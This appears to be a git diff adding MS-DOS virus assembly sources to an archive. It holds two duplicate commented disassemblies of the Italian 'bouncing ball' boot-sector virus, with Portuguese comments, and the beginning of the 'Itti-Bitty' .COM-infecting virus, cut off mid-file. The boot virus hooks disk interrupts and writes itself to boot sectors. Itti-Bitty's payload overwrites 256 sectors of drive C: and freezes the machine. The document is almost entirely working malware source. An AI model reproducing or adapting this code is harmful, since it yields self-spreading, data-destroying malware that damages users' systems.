CCCCCCCCCCCCCCCC +;0830 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0840 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0850 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0860 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0870 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0880 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0890 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08A0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08B0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08C0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08D0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08E0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;08F0 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;0900 C3 C3 C3 C3 C3 C3 C3 C3-C3 C3 C3 C3 C3 C3 C3 C3 CCCCCCCCCCCCCCCC +;>>>>>>>>>> ORIGINAL CODE ENDS HERE +;0910 4D 73 44 6F 73 +;-----------------------------------------------------------------------; + END diff --git a/MSDOS/Virus.MSDOS.Unknown.ital.asm b/MSDOS/Virus.MSDOS.Unknown.ital.asm new file mode 100644 index 00000000..157d83b9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ital.asm @@ -0,0 +1,454 @@ +; ************************************************** +; *** VIRUS ITALIANO SALTITANTE - A LISTAGEM *** +; *** Desassemblagem obtida por Miguel Vitorino *** +; *** Para : S P O O L E R - Junho de 1989 *** +; ************************************************** + +.RADIX 16 + +jmpf macro x + db 0eah + dd x +endm + +Virus SEGMENT +assume cs:virus;ds:virus + +jmpf MACRO x + db 0eah + dd x +ENDM + +org 0100h + +begin: jmp short entry + + db 1eh-2 dup (?) ; Informacao relativa a' disquete + +entry: xor ax,ax + mov ss,ax + mov sp,7c00 ; Colocar o Stack antes do inicio do + mov ds,ax ; virus + mov ax,ds:[0413] ; Retirar 2 K como se nao existissem + sub ax,2 ; para que o DOS nao la' chegue ! + mov ds:[0413],ax + mov cl,06 ; Converter o tamanho da RAM num + shl ax,cl ; numero de segmento que se situa nos + sub ax,07c0 ; 2 ultimos K + mov es,ax ; De seguida passar este programa + mov si,7c00 ; para esse sitio de memoria + mov di,si ; ( i.e. o programa transfere-se a si + mov cx,0100 ; proprio ) + repz movsw + mov cs,ax ; Transferencia de controlo para ai! + push cs ; Agora sim , ja' estamos nos tais 2K + pop ds + call reset ; fazer duas vezes um "reset" ao +reset: xor ah,ah ; controlador de disco + int 13 + and byte ptr ds:drive,80 + mov bx,ds:sector ; Sector onde esta' o resto do virus + push cs + pop ax + sub ax,0020 + mov es,ax + call ler_sector ; Ler o resto do virus da drive + mov bx,ds:sector + inc bx + mov ax,0ffc0 ; Carregar o sector de boot original + mov es,ax + call ler_sector + xor ax,ax + mov ds:estado,al + mov ds,ax + mov ax,ds:[004c] ; "Confiscar" o interrupt 13 + mov bx,ds:[004e] ; ( operacoes sobre disquetes/discos ) + mov word ptr ds:[004c],offset int_13 + mov ds:[004e],cs + push cs + pop ds + mov word ptr ds:velho_13,ax ; Guardar a velha rotina do int. 13 + mov word ptr ds:velho_13+2,bx + mov dl,ds:drive + jmpf 0:7c00 ; Efectuar o arranque do sistema + +Esc_Sector proc near + mov ax,0301 ; Escrever um sector da drive + jmp short cs:transferir +Esc_Sector endp + +Ler_Sector proc near + mov ax,0201 ; Ler um sector da drive +Ler_Sector endp + +Transferir proc near ; Efectuar uma transferencia de dados + xchg ax,bx ; de ou para a drive + add ax,ds:[7c1c] ; Este procedimento tem como entrada + xor dx,dx ; o numero do sector pretendido ( BX ) + div ds:[7c18] ; e de seguida sao feitas as contas + inc dl ; para saber qual a pista e o lado + mov ch,dl ; onde esse sector fica + xor dx,dx + div ds:[7c1a] + mov cl,06 + shl ah,cl + or ah,ch + mov cx,ax + xchg ch,cl + mov dh,dl + mov ax,bx ; Depois de todas as contas feitas +transf: mov dl,ds:drive ; pode-se chamar o interrupt 13H + mov bx,8000 ; es:bx = end. de transferencia + int 13 + jnb trans_exit + pop ax +trans_exit: ret +Transferir endp + +Int_13 proc near ; Rotina de atendimento ao int. 13H + push ds ; (operacoes sobre discos e disquetes) + push es + push ax + push bx + push cx + push dx + push cs + pop ds + push cs + pop es + test byte ptr ds:estado,1 ; Testar se se esta' a ver se o virus + jnz call_BIOS ; esta' no disco + cmp ah,2 + jnz call_BIOS + cmp ds:drive,dl ; Ver se a ultima drive que foi + mov ds:drive,dl ; mexida e' igual a' drive onde + jnz outra_drv ; se vai mexer + xor ah,ah ; Neste momento vai-se tirar a' sorte + int 1a ; para ver se o virus fica activo + test dh,7f ; Isto e' feito a partir da leitura + jnz nao_desp ; da hora e se for igual a um dado + test dl,0f0 ; numero , o virus e' despoletado + jnz nao_desp + push dx ; Instalar o movimento da bola + call despoletar + pop dx +nao_desp: mov cx,dx + sub dx,ds:semente + mov ds:semente,cx + sub dx,24 + jb call_BIOS +outra_drv: or byte ptr ds:estado,1 ; Indicar que se esta' a testar a + push si ; presenca ou nao do virus na drive + push di + call contaminar + pop di + pop si + and byte ptr ds:estado,0fe ; Indicar fim de teste de virus +call_BIOS: pop dx + pop cx + pop bx + pop ax + pop es + pop ds +Velho_13 equ $+1 + jmpf 0:0 +Int_13 endp + +Contaminar proc near + mov ax,0201 + mov dh,0 + mov cx,1 + call transf + test byte ptr ds:drive,80 ; Pediu-se um reset a' drive ? + jz testar_drv ; Sim , passar a' contaminacao directa + mov si,81be + mov cx,4 +proximo: cmp byte ptr [si+4],1 + jz ler_sect + cmp byte ptr [si+4],4 + jz ler_sect + add si,10 + loop proximo + ret + +ler_sect: mov dx,[si] ; Cabeca+drive + mov cx,[si+2] ; Pista+sector inicial + mov ax,0201 ; Ler esse sector + call transf +testar_drv: mov si,8002 ; Comparar os 28 primeiros bytes para + mov di,7c02 ; ver se o sector de boot e' o mesmo + mov cx,1c ; i.e. ver se a drive ja' foi virada ! + repz movsb + cmp word ptr ds:[offset flag+0400],1357 + jnz esta_limpa + cmp byte ptr ds:flag_2,0 + jnb tudo_bom + mov ax,word ptr ds:[offset prim_dados+0400] + mov ds:prim_dados,ax ; Se chegar aqui entao a disquete ja' + mov si,ds:[offset sector+0400] ; esta' contaminada ! + jmp infectar +tudo_bom: ret + +; Neste momento descobriu-se uma disquete nao contaminada ! Vai-se agora +; proceder a' respectiva contaminacao ! + +esta_limpa: cmp word ptr ds:[800bh],0200; Bytes por sector + jnz tudo_bom + cmp byte ptr ds:[800dh],2 ; Sectores por cluster + jb tudo_bom + mov cx,ds:[800e] ; Sectores reservados + mov al,byte ptr ds:[8010] ; Numero de FAT's + cbw + mul word ptr ds:[8016] ; Numero de sectores de FAT + add cx,ax + mov ax,' ' + mul word ptr ds:[8011] ; Numero de entradas na root + add ax,01ff + mov bx,0200 + div bx + add cx,ax + mov ds:prim_dados,cx + mov ax,ds:[7c13] ; Numero de sectores da drive + sub ax,ds:prim_dados + mov bl,byte ptr ds:[7c0dh] ; Numero de sectores por cluster + xor dx,dx + xor bh,bh + div bx + inc ax + mov di,ax + and byte ptr ds:estado,0fbh ; Se o numero de clusters dor superior + cmp ax,0ff0 ; a 0FF0 entao cada entrada na FAT sao + jbe sao_3 ; 4 nibbles senao sao 3 + or byte ptr ds:estado,4 ; 4 = disco duro ? +sao_3: mov si,1 ; Escolher sector a infectar + mov bx,ds:[7c0e] ; Numero de sectores reservados + dec bx + mov ds:inf_sector,bx ; Sector a infectar + mov byte ptr ds:FAT_sector,0fe + jmp short continua + +Inf_Sector dw 1 ; Sector a infectar +Prim_Dados dw 0c ; Numero do primeiro sector de dados +Estado db 0 ; Estado actual do virus (instalado/nao instalado,etc) +Drive db 1 ; Drive onde se pediu uma accao +Sector dw 0ec ; Sector auxiliar para procura do virus +Flag_2 db 0 ; Estes proximos valores servem para ver se o virus +Flag dw 1357 ; ja' esta' ou nao presente numa drive , bastando + dw 0aa55 ; comparar se estes valores batem certos para o saber + +continua: inc word ptr ds:inf_sector + mov bx,ds:inf_sector + add byte ptr ds:[FAT_sector],2 + call ler_sector + jmp short l7e4b + +; Este pequeno pedaco de programa o que faz e' percorrer a FAT que ja' esta' na +; memo'ria e procurar ai um cluster livre para colocar nesse sitio o resto do +; virus + +verificar: mov ax,3 ; Media descriptor + ff,ff + test byte ptr ds:estado,4 ; disco duro ? + jz l7e1d + inc ax ; Sim , FAT comeca 1 byte mais adiante +l7e1d: mul si ; Multiplicar pelo numero do cluster + shr ax,1 + sub ah,ds:FAT_sector + mov bx,ax + cmp bx,01ff + jnb continua + mov dx,[bx+8000] ; Ler a entrada na FAT + test byte ptr ds:estado,4 + jnz l7e45 + mov cl,4 + test si,1 + jz l7e42 + shr dx,cl +l7e42: and dh,0f +l7e45: test dx,0ffff ; Se a entrada na FAT for zero,entao + jz l7e51 ; descobriu-se um cluster para por o +l7e4b: inc si ; virus , senao passa-se ao proximo + cmp si,di ; cluster ate' achar um bom + jbe verificar + ret + +; Ja' foi descoberto qual o cluster a infectar ( registo BX ) , agora vai-se +; proceder a' infeccao da disquete ou disco e tambem a' marcacao desse cluster +; como um "bad cluster" para o DOS nao aceder a ele + +l7e51: mov dx,0fff7 ; Marcar um "bad cluster" (ff7) + test byte ptr ds:estado,4 ; Ver qual o tamanho das ents. na FAT + jnz l7e68 ; ( 3 ou 4 nibbles ) + and dh,0f + mov cl,4 + test si,1 + jz l7e68 + shl dx,cl +l7e68: or [bx+8000],dx + mov bx,word ptr ds:inf_sector ; Infectar sector !!! + call esc_sector + mov ax,si + sub ax,2 + mov bl,ds:7c0dh ; Numero de sectores por cluster + xor bh,bh + mul bx + add ax,ds:prim_dados + mov si,ax ; SI = sector a infectar + mov bx,0 ; Ler o sector de boot original + call ler_sector + mov bx,si + inc bx + call esc_sector ; ... e guarda'-lo depois do virus +infectar: mov bx,si + mov word ptr ds:sector,si + push cs + pop ax + sub ax,20 ; Escrever o resto do virus + mov es,ax + call esc_sector + push cs + pop ax + sub ax,40 + mov es,ax + mov bx,0 ; Escrever no sector de boot o virus + call esc_sector + ret +Contaminar endp + +Semente dw ? ; Esta word serve para fins de + ; temporizacao da bola a saltar +FAT_sector db 0 ; Diz qual e' o numero do sector que + ; se esta' a percorrer quando se + ; vasculha a FAT + +Despoletar proc near ; Comecar a mostrar a bola no ecran + test byte ptr ds:estado,2 ; Virus ja' esta' activo ? + jnz desp_exit ; Sim ,sair + or byte ptr ds:estado,2 ; Nao , marcar activacao + mov ax,0 + mov ds,ax + mov ax,ds:20 ; Posicionar interrupt 8 (relogio) + mov bx,ds:22 + mov word ptr ds:20,offset int_8 + mov ds:22,cs + push cs + pop ds ; E guardar a rotina anterior + mov word ptr ds:velho_8+8,ax + mov word ptr ds:velho_8+2,bx +desp_exit: ret +Despoletar endp + +Int_8 proc near ; Rotina de atendimento ao interrupt + push ds ; provocado pelo relogio 18.2 vezes + push ax ; por segundo . Neste procedimento + push bx ; e' que se faz o movimento da bola + push cx ; pelo ecran + push dx + push cs + pop ds + mov ah,0f ; Ver qual o tipo de modo de video + int 10 + mov bl,al + cmp bx,ds:modo_pag ; Comparar modo e pagina de video com + jz ler_cur ; os anteriores + mov ds:modo_pag,bx ; Quando aqui chega mudou-se o modo + dec ah ; de video + mov ds:colunas,ah ; Guardar o numero de colunas + mov ah,1 + cmp bl,7 ; Comparar modo com 7 (80x25 Mono) + jnz e_CGA + dec ah +e_CGA: cmp bl,4 ; Ve se e' modo grafico + jnb e_grafico + dec ah +e_grafico: mov ds:muda_attr,ah + mov word ptr ds:coordenadas,0101 + mov word ptr ds:direccao,0101 + mov ah,3 ; Ler a posicao do cursor + int 10 + push dx ; ... e guarda-la + mov dx,ds:coordenadas + jmp short limites + +ler_cur: mov ah,3 ; Ler a posicao do cursor ... + int 10 + push dx ; ... e guarda-la + mov ah,2 ; Posicionar o cursor no sitio da bola + mov dx,ds:coordenadas + int 10 + mov ax,ds:carat_attr + cmp byte ptr ds:muda_attr,1 + jnz mudar_atr + mov ax,8307 ; Atributos e carater 7 +mudar_atr: mov bl,ah ; Carregar carater 7 (bola) + mov cx,1 + mov ah,9 ; Escrever a bola no ecran + int 10 +limites: mov cx,ds:direccao ; Agora vai-se ver se a bola esta' no + cmp dh,0 ; ecran . Linha = 0 ? + jnz linha_1 + xor ch,0ff ; Mudar direccao + inc ch +linha_1: cmp dh,18 ; Linha = 24 ? + jnz coluna_1 + xor ch,0ff ; Mudar direccao + inc ch +coluna_1: cmp dl,0 ; Coluna = 0 ? + jnz coluna_2 + xor cl,0ff ; Mudar direccao + inc cl +coluna_2: cmp dl,ds:colunas ; Colunas = numero de colunas ? + jnz esta_fixe + xor cl,0ff ; Mudar direccao + inc cl +esta_fixe: cmp cx,ds:direccao ; Mesma direccao ? + jnz act_bola + mov ax,ds:carat_attr + and al,7 + cmp al,3 + jnz nao_e + xor ch,0ff + inc ch +nao_e: cmp al,5 + jnz act_bola + xor cl,0ff + inc cl +act_bola: add dl,cl ; Actualizar as coordenadas da bola + add dh,ch + mov ds:direccao,cx + mov ds:coordenadas,dx + mov ah,2 + int 10 + mov ah,8 ; Ler carater para onde vai a bola + int 10 + mov ds:carat_attr,ax + mov bl,ah + cmp byte ptr ds:muda_attr,1 + jnz nao_muda + mov bl,83 ; Novo atributo +nao_muda: mov cx,1 + mov ax,0907 ; Escrever a bola no ecran + int 10 + pop dx + mov ah,2 ; Recolocar o cursor no posicao onde + int 10 ; estava antes de escrever a bola + pop dx + pop cx + pop bx + pop ax + pop ds +velho_8 equ $+1 + jmpf 0:0 +Int_8 endp + +Carat_attr dw ? ; 7fcd +Coordenadas dw 0101 ; 7fcf +Direccao dw 0101 ; 7fd1 +Muda_attr db 1 ; 7fd3 +Modo_pag dw ? ; 7fd4 +Colunas db ? ; 7fd6 + +; Os bytes que se seguem destinam-se a reservar espaco para o stack + +Virus ENDS + +END begin \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.italiano.asm b/MSDOS/Virus.MSDOS.Unknown.italiano.asm new file mode 100644 index 00000000..2f0c335f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.italiano.asm @@ -0,0 +1,455 @@ +; ************************************************** +; *** VIRUS ITALIANO SALTITANTE - A LISTAGEM *** +; *** Desassemblagem obtida por Miguel Vitorino *** +; *** Para : S P O O L E R - Junho de 1989 *** +; ************************************************** + +.RADIX 16 + +jmpf macro x + db 0eah + dd x +endm + +Virus SEGMENT +assume cs:virus;ds:virus + +jmpf MACRO x + db 0eah + dd x +ENDM + +org 0100h + +begin: jmp short entry + + db 1eh-2 dup (?) ; Informacao relativa a' disquete + +entry: xor ax,ax + mov ss,ax + mov sp,7c00 ; Colocar o Stack antes do inicio do + mov ds,ax ; virus + mov ax,ds:[0413] ; Retirar 2 K como se nao existissem + sub ax,2 ; para que o DOS nao la' chegue ! + mov ds:[0413],ax + mov cl,06 ; Converter o tamanho da RAM num + shl ax,cl ; numero de segmento que se situa nos + sub ax,07c0 ; 2 ultimos K + mov es,ax ; De seguida passar este programa + mov si,7c00 ; para esse sitio de memoria + mov di,si ; ( i.e. o programa transfere-se a si + mov cx,0100 ; proprio ) + repz movsw + mov cs,ax ; Transferencia de controlo para ai! + push cs ; Agora sim , ja' estamos nos tais 2K + pop ds + call reset ; fazer duas vezes um "reset" ao +reset: xor ah,ah ; controlador de disco + int 13 + and byte ptr ds:drive,80 + mov bx,ds:sector ; Sector onde esta' o resto do virus + push cs + pop ax + sub ax,0020 + mov es,ax + call ler_sector ; Ler o resto do virus da drive + mov bx,ds:sector + inc bx + mov ax,0ffc0 ; Carregar o sector de boot original + mov es,ax + call ler_sector + xor ax,ax + mov ds:estado,al + mov ds,ax + mov ax,ds:[004c] ; "Confiscar" o interrupt 13 + mov bx,ds:[004e] ; ( operacoes sobre disquetes/discos ) + mov word ptr ds:[004c],offset int_13 + mov ds:[004e],cs + push cs + pop ds + mov word ptr ds:velho_13,ax ; Guardar a velha rotina do int. 13 + mov word ptr ds:velho_13+2,bx + mov dl,ds:drive + jmpf 0:7c00 ; Efectuar o arranque do sistema + +Esc_Sector proc near + mov ax,0301 ; Escrever um sector da drive + jmp short cs:transferir +Esc_Sector endp + +Ler_Sector proc near + mov ax,0201 ; Ler um sector da drive +Ler_Sector endp + +Transferir proc near ; Efectuar uma transferencia de dados + xchg ax,bx ; de ou para a drive + add ax,ds:[7c1c] ; Este procedimento tem como entrada + xor dx,dx ; o numero do sector pretendido ( BX ) + div ds:[7c18] ; e de seguida sao feitas as contas + inc dl ; para saber qual a pista e o lado + mov ch,dl ; onde esse sector fica + xor dx,dx + div ds:[7c1a] + mov cl,06 + shl ah,cl + or ah,ch + mov cx,ax + xchg ch,cl + mov dh,dl + mov ax,bx ; Depois de todas as contas feitas +transf: mov dl,ds:drive ; pode-se chamar o interrupt 13H + mov bx,8000 ; es:bx = end. de transferencia + int 13 + jnb trans_exit + pop ax +trans_exit: ret +Transferir endp + +Int_13 proc near ; Rotina de atendimento ao int. 13H + push ds ; (operacoes sobre discos e disquetes) + push es + push ax + push bx + push cx + push dx + push cs + pop ds + push cs + pop es + test byte ptr ds:estado,1 ; Testar se se esta' a ver se o virus + jnz call_BIOS ; esta' no disco + cmp ah,2 + jnz call_BIOS + cmp ds:drive,dl ; Ver se a ultima drive que foi + mov ds:drive,dl ; mexida e' igual a' drive onde + jnz outra_drv ; se vai mexer + xor ah,ah ; Neste momento vai-se tirar a' sorte + int 1a ; para ver se o virus fica activo + test dh,7f ; Isto e' feito a partir da leitura + jnz nao_desp ; da hora e se for igual a um dado + test dl,0f0 ; numero , o virus e' despoletado + jnz nao_desp + push dx ; Instalar o movimento da bola + call despoletar + pop dx +nao_desp: mov cx,dx + sub dx,ds:semente + mov ds:semente,cx + sub dx,24 + jb call_BIOS +outra_drv: or byte ptr ds:estado,1 ; Indicar que se esta' a testar a + push si ; presenca ou nao do virus na drive + push di + call contaminar + pop di + pop si + and byte ptr ds:estado,0fe ; Indicar fim de teste de virus +call_BIOS: pop dx + pop cx + pop bx + pop ax + pop es + pop ds +Velho_13 equ $+1 + jmpf 0:0 +Int_13 endp + +Contaminar proc near + mov ax,0201 + mov dh,0 + mov cx,1 + call transf + test byte ptr ds:drive,80 ; Pediu-se um reset a' drive ? + jz testar_drv ; Sim , passar a' contaminacao directa + mov si,81be + mov cx,4 +proximo: cmp byte ptr [si+4],1 + jz ler_sect + cmp byte ptr [si+4],4 + jz ler_sect + add si,10 + loop proximo + ret + +ler_sect: mov dx,[si] ; Cabeca+drive + mov cx,[si+2] ; Pista+sector inicial + mov ax,0201 ; Ler esse sector + call transf +testar_drv: mov si,8002 ; Comparar os 28 primeiros bytes para + mov di,7c02 ; ver se o sector de boot e' o mesmo + mov cx,1c ; i.e. ver se a drive ja' foi virada ! + repz movsb + cmp word ptr ds:[offset flag+0400],1357 + jnz esta_limpa + cmp byte ptr ds:flag_2,0 + jnb tudo_bom + mov ax,word ptr ds:[offset prim_dados+0400] + mov ds:prim_dados,ax ; Se chegar aqui entao a disquete ja' + mov si,ds:[offset sector+0400] ; esta' contaminada ! + jmp infectar +tudo_bom: ret + +; Neste momento descobriu-se uma disquete nao contaminada ! Vai-se agora +; proceder a' respectiva contaminacao ! + +esta_limpa: cmp word ptr ds:[800bh],0200; Bytes por sector + jnz tudo_bom + cmp byte ptr ds:[800dh],2 ; Sectores por cluster + jb tudo_bom + mov cx,ds:[800e] ; Sectores reservados + mov al,byte ptr ds:[8010] ; Numero de FAT's + cbw + mul word ptr ds:[8016] ; Numero de sectores de FAT + add cx,ax + mov ax,' ' + mul word ptr ds:[8011] ; Numero de entradas na root + add ax,01ff + mov bx,0200 + div bx + add cx,ax + mov ds:prim_dados,cx + mov ax,ds:[7c13] ; Numero de sectores da drive + sub ax,ds:prim_dados + mov bl,byte ptr ds:[7c0dh] ; Numero de sectores por cluster + xor dx,dx + xor bh,bh + div bx + inc ax + mov di,ax + and byte ptr ds:estado,0fbh ; Se o numero de clusters dor superior + cmp ax,0ff0 ; a 0FF0 entao cada entrada na FAT sao + jbe sao_3 ; 4 nibbles senao sao 3 + or byte ptr ds:estado,4 ; 4 = disco duro ? +sao_3: mov si,1 ; Escolher sector a infectar + mov bx,ds:[7c0e] ; Numero de sectores reservados + dec bx + mov ds:inf_sector,bx ; Sector a infectar + mov byte ptr ds:FAT_sector,0fe + jmp short continua + +Inf_Sector dw 1 ; Sector a infectar +Prim_Dados dw 0c ; Numero do primeiro sector de dados +Estado db 0 ; Estado actual do virus (instalado/nao instalado,etc) +Drive db 1 ; Drive onde se pediu uma accao +Sector dw 0ec ; Sector auxiliar para procura do virus +Flag_2 db 0 ; Estes proximos valores servem para ver se o virus +Flag dw 1357 ; ja' esta' ou nao presente numa drive , bastando + dw 0aa55 ; comparar se estes valores batem certos para o saber + +continua: inc word ptr ds:inf_sector + mov bx,ds:inf_sector + add byte ptr ds:[FAT_sector],2 + call ler_sector + jmp short l7e4b + +; Este pequeno pedaco de programa o que faz e' percorrer a FAT que ja' esta' na +; memo'ria e procurar ai um cluster livre para colocar nesse sitio o resto do +; virus + +verificar: mov ax,3 ; Media descriptor + ff,ff + test byte ptr ds:estado,4 ; disco duro ? + jz l7e1d + inc ax ; Sim , FAT comeca 1 byte mais adiante +l7e1d: mul si ; Multiplicar pelo numero do cluster + shr ax,1 + sub ah,ds:FAT_sector + mov bx,ax + cmp bx,01ff + jnb continua + mov dx,[bx+8000] ; Ler a entrada na FAT + test byte ptr ds:estado,4 + jnz l7e45 + mov cl,4 + test si,1 + jz l7e42 + shr dx,cl +l7e42: and dh,0f +l7e45: test dx,0ffff ; Se a entrada na FAT for zero,entao + jz l7e51 ; descobriu-se um cluster para por o +l7e4b: inc si ; virus , senao passa-se ao proximo + cmp si,di ; cluster ate' achar um bom + jbe verificar + ret + +; Ja' foi descoberto qual o cluster a infectar ( registo BX ) , agora vai-se +; proceder a' infeccao da disquete ou disco e tambem a' marcacao desse cluster +; como um "bad cluster" para o DOS nao aceder a ele + +l7e51: mov dx,0fff7 ; Marcar um "bad cluster" (ff7) + test byte ptr ds:estado,4 ; Ver qual o tamanho das ents. na FAT + jnz l7e68 ; ( 3 ou 4 nibbles ) + and dh,0f + mov cl,4 + test si,1 + jz l7e68 + shl dx,cl +l7e68: or [bx+8000],dx + mov bx,word ptr ds:inf_sector ; Infectar sector !!! + call esc_sector + mov ax,si + sub ax,2 + mov bl,ds:7c0dh ; Numero de sectores por cluster + xor bh,bh + mul bx + add ax,ds:prim_dados + mov si,ax ; SI = sector a infectar + mov bx,0 ; Ler o sector de boot original + call ler_sector + mov bx,si + inc bx + call esc_sector ; ... e guarda'-lo depois do virus +infectar: mov bx,si + mov word ptr ds:sector,si + push cs + pop ax + sub ax,20 ; Escrever o resto do virus + mov es,ax + call esc_sector + push cs + pop ax + sub ax,40 + mov es,ax + mov bx,0 ; Escrever no sector de boot o virus + call esc_sector + ret +Contaminar endp + +Semente dw ? ; Esta word serve para fins de + ; temporizacao da bola a saltar +FAT_sector db 0 ; Diz qual e' o numero do sector que + ; se esta' a percorrer quando se + ; vasculha a FAT + +Despoletar proc near ; Comecar a mostrar a bola no ecran + test byte ptr ds:estado,2 ; Virus ja' esta' activo ? + jnz desp_exit ; Sim ,sair + or byte ptr ds:estado,2 ; Nao , marcar activacao + mov ax,0 + mov ds,ax + mov ax,ds:20 ; Posicionar interrupt 8 (relogio) + mov bx,ds:22 + mov word ptr ds:20,offset int_8 + mov ds:22,cs + push cs + pop ds ; E guardar a rotina anterior + mov word ptr ds:velho_8+8,ax + mov word ptr ds:velho_8+2,bx +desp_exit: ret +Despoletar endp + +Int_8 proc near ; Rotina de atendimento ao interrupt + push ds ; provocado pelo relogio 18.2 vezes + push ax ; por segundo . Neste procedimento + push bx ; e' que se faz o movimento da bola + push cx ; pelo ecran + push dx + push cs + pop ds + mov ah,0f ; Ver qual o tipo de modo de video + int 10 + mov bl,al + cmp bx,ds:modo_pag ; Comparar modo e pagina de video com + jz ler_cur ; os anteriores + mov ds:modo_pag,bx ; Quando aqui chega mudou-se o modo + dec ah ; de video + mov ds:colunas,ah ; Guardar o numero de colunas + mov ah,1 + cmp bl,7 ; Comparar modo com 7 (80x25 Mono) + jnz e_CGA + dec ah +e_CGA: cmp bl,4 ; Ve se e' modo grafico + jnb e_grafico + dec ah +e_grafico: mov ds:muda_attr,ah + mov word ptr ds:coordenadas,0101 + mov word ptr ds:direccao,0101 + mov ah,3 ; Ler a posicao do cursor + int 10 + push dx ; ... e guarda-la + mov dx,ds:coordenadas + jmp short limites + +ler_cur: mov ah,3 ; Ler a posicao do cursor ... + int 10 + push dx ; ... e guarda-la + mov ah,2 ; Posicionar o cursor no sitio da bola + mov dx,ds:coordenadas + int 10 + mov ax,ds:carat_attr + cmp byte ptr ds:muda_attr,1 + jnz mudar_atr + mov ax,8307 ; Atributos e carater 7 +mudar_atr: mov bl,ah ; Carregar carater 7 (bola) + mov cx,1 + mov ah,9 ; Escrever a bola no ecran + int 10 +limites: mov cx,ds:direccao ; Agora vai-se ver se a bola esta' no + cmp dh,0 ; ecran . Linha = 0 ? + jnz linha_1 + xor ch,0ff ; Mudar direccao + inc ch +linha_1: cmp dh,18 ; Linha = 24 ? + jnz coluna_1 + xor ch,0ff ; Mudar direccao + inc ch +coluna_1: cmp dl,0 ; Coluna = 0 ? + jnz coluna_2 + xor cl,0ff ; Mudar direccao + inc cl +coluna_2: cmp dl,ds:colunas ; Colunas = numero de colunas ? + jnz esta_fixe + xor cl,0ff ; Mudar direccao + inc cl +esta_fixe: cmp cx,ds:direccao ; Mesma direccao ? + jnz act_bola + mov ax,ds:carat_attr + and al,7 + cmp al,3 + jnz nao_e + xor ch,0ff + inc ch +nao_e: cmp al,5 + jnz act_bola + xor cl,0ff + inc cl +act_bola: add dl,cl ; Actualizar as coordenadas da bola + add dh,ch + mov ds:direccao,cx + mov ds:coordenadas,dx + mov ah,2 + int 10 + mov ah,8 ; Ler carater para onde vai a bola + int 10 + mov ds:carat_attr,ax + mov bl,ah + cmp byte ptr ds:muda_attr,1 + jnz nao_muda + mov bl,83 ; Novo atributo +nao_muda: mov cx,1 + mov ax,0907 ; Escrever a bola no ecran + int 10 + pop dx + mov ah,2 ; Recolocar o cursor no posicao onde + int 10 ; estava antes de escrever a bola + pop dx + pop cx + pop bx + pop ax + pop ds +velho_8 equ $+1 + jmpf 0:0 +Int_8 endp + +Carat_attr dw ? ; 7fcd +Coordenadas dw 0101 ; 7fcf +Direccao dw 0101 ; 7fd1 +Muda_attr db 1 ; 7fd3 +Modo_pag dw ? ; 7fd4 +Colunas db ? ; 7fd6 + +; Os bytes que se seguem destinam-se a reservar espaco para o stack + +Virus ENDS + +END begin + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.itti-a.asm b/MSDOS/Virus.MSDOS.Unknown.itti-a.asm new file mode 100644 index 00000000..0c120420 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.itti-a.asm @@ -0,0 +1,124 @@ +; Itti-Bitty Virus, Strain A +; The world's smallest virus (except for Strain B, but still only 161 bytes) +; +; (C) 1991 Nowhere Man and [NuKE] WaErZ +; Written by Nowhere Man + + title "The Itti-Bitty Virus, Strain A: The smallest virus ever" + + code segment 'CODE' + assume cs:code,ds:code,es:code,ss:code + + org 0100h + +code_length equ finish - start + +start label near + +id_bytes proc near + mov si,si ; Serves no purpose: our ID +id_bytes endp + +main proc near + mov ax,0FF0Fh ; Virex installation check function + int 021h + cmp ax,0101h ; Is Virex loaded? + je exit_virus ; If so, then bail out now + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds attribute mask + mov dx,offset com_spec ; DX points to "*.COM" + +file_loop: int 021h + jc go_off ; If there are no files, go off + + call infect_file ; Try to infect found file + jne exit_virus ; Exit if successful + + mov ah,04Fh ; DOS find next file function + jmp short file_loop ; Repeat until out of files + +exit_virus: mov ah,9 ; DOS display string function + mov dx,offset fake_error ; DX points to fake error message + int 021h + + mov ax,04C01h ; DOS terminate function, code 1 + int 021h +main endp + +go_off proc near + cli ; Prevent all interrupts + + mov ah,2 ; AH holds drive number (C:) + cwd ; Start with sector 0 (boot sector) + mov cx,0100h ; Write 256 sectors (fucks disk) + int 026h ; DOS absolute write interrupt + + jmp $ ; Infinite loop; lock up computer +go_off endp + +infect_file proc near + mov ax,04301h ; DOS set file attributes function + xor cx,cx ; Clear all attributes + mov dx,09Eh ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, read-write + int 021h + + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,2 ; CX holds byte to read (2) + mov dx,offset buffer ; 